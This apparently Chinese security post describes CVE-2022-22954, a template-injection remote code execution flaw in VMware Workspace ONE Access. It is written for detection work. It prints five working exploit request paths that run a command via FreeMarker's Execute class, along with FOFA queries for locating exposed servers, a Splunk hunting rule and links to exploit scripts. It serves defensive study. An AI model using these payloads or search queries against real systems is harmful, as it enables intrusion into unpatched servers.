CVE-2022-22954-VMware Workspace ONE Access SSTI远程代码执行流量特征

简介

仅用于技术交流和学习研究使用，请勿用于非法攻击，否则造成一切后果与本人无关

VMware Workspace ONE Access and Identity Manager包含一个由于服务器端模板注入而导致的远程代码执行漏洞。VMware已将此问题的严重性评估为处于严重严重性范围内 ，CVSSv3基本得分最高为9.8。

具有网络访问权限的恶意行为者可以触发可能导致远程代码执行的服务器端模板注入。

影响范围

VMware Workspace ONE Access Appliance （版本号：20.10.0.0 ，20.10.0.1 ，21.08.0.0 ，21.08.0.1 ）
VMware Identity Manager Appliance （版本号：3.3.3 ， 3.3.4 ， 3.3.5 ，3.3.6）
VMware Realize Automation （版本号：7.6）
1
2
3

EXP/POC

请勿用做非法用途，仅用于检测测试。

fofa语法：

icon_hash="-1250474341"
app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager"
1
2

/catalog-portal/ui?code=&deviceUdid=&deviceType=%24%7B"freemarker.template.utility.Execute"%3Fnew%28%29%28"id"%29%7D
/catalog-portal/hub-ui?deviceType=&deviceUdid=%24%7B"freemarker.template.utility.Execute"%3Fnew%28%29%28"id"%29%7D
/catalog-portal/hub-ui/byob?deviceType=&deviceUdid=%24%7B"freemarker.template.utility.Execute"%3Fnew%28%29%28"id"%29%7D
/catalog-portal/ui/oauth/verify?error=&deviceType=&deviceUdid=%24%7B"freemarker.template.utility.Execute"%3Fnew%28%29%28"id"%29%7D
/catalog-portal/ui/oauth/verify?code=&deviceType=&deviceUdid=%24%7B"freemarker.template.utility.Execute"%3Fnew%28%29%28"id"%29%7D
1
2
3
4
5

URL decode

/catalog-portal/ui?code=&deviceUdid=&deviceType=${"freemarker.template.utility.Execute"?new()("id")}
/catalog-portal/hub-ui?deviceType=&deviceUdid=${"freemarker.template.utility.Execute"?new()("id")}
/catalog-portal/hub-ui/byob?deviceType=&deviceUdid=${"freemarker.template.utility.Execute"?new()("id")}
/catalog-portal/ui/oauth/verify?error=&deviceType=&deviceUdid=${"freemarker.template.utility.Execute"?new()("id")}
/catalog-portal/ui/oauth/verify?code=&deviceType=&deviceUdid=${"freemarker.template.utility.Execute"?new()("id")}
1
2
3
4
5

检测规则/思路

Splunk公开规则

| tstats count from datamodel=Web where Web.http_method IN ("GET")
  Web.url="*deviceudid=*" AND Web.url IN ("*java.lang.ProcessBuilder*","*freemarker.template.utility.ObjectConstructor*")
  by Web.http_user_agent Web.http_method, Web.url,Web.url_length Web.src, Web.dest sourcetype
  | `drop_dm_object_name("Web")` 
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)` 
  | `vmware_server_side_template_injection_hunt_filter
1
2
3
4
5
6
7

结合状态码及返回内容包进行分析研判。以下可作为参考：

返回状态为200，且包涵Authorization context is not valid
1

参考推荐

vmware_server_side_template_injection_hunt

https://github.com/splunk/security_content/blob/develop/detections/web/vmware_server_side_template_injection_hunt.yml

利用脚本

https://github.com/bewhale/CVE-2022-22954

CVE-2022-22954 VMware Workspace ONE Access SSTI RCE

https://xz.aliyun.com/t/11196

zeek-CVE-2022-22954

https://github.com/corelight/cve-2022-22954